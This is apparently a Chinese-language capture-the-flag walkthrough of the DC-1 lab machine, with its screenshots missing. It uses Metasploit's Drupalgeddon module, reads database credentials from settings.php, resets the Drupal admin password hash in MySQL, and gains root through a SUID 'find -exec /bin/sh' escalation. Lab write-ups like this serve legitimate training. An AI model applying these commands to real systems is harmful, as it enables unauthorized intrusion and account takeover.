靶机渗透DC-1

扫描靶机IP

001

然后nmap一波。

002

开放了80端口，访问。

首次访问需要把IP放到hosts中。

cd /etc

find . -name "host*"

vim ./hosts

003

网站是Drupal服务，上神器msf。

004

七个可用模块。

使用exploit/multi/http/drupal_drupageddon

005

设置好options启动攻击

006

弹回了meterpreter

收集主机信息

006

进入shell

ls一下，发现flag1

007

008

看下权限，发现不是root，需要提权。

009

根据flag信息，查看配置。

在sites/default/settings.php中

010

看到了flag2.txt和数据库信息。

直接mysql -udbuser -p,但是不能进入mysql命令行。

011

012

查看到了python版本信息。使用python进入交互shell。

python -c "import pty;pty.spawn('/bin/bash')"

013

再使用

mysql -udbuser -p

成功进入mysql命令行

014

在users表里发现两个用户。

015

但是密码被加密了。

用重置密码。

使用drupal自带的hash加密

php scripts/password-hash.sh drupall > pwd.txt

016

再次进入mysql，对密码进行重置。

update users set pass = '$S$DDuvmUjUDJkHrjjOarywjMVR0Ne/osYlPfLPtWH1bRMbHbZyADey' where name = 'admin';

017

到网站上，用账号密码登陆。

018

成功登陆。

找到了flag3

019

在目录里查找到flag4

020

根据提示，要进入root目录。但是发现被拒绝。

021

查找系统上运行的所有suid可执行文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

022

再查找。

find ./ aaa -exec '/bin/sh' \;

023

成功提权为root。

再进入root目录，成功进入，并找到finalflag。

024

要点

suid提权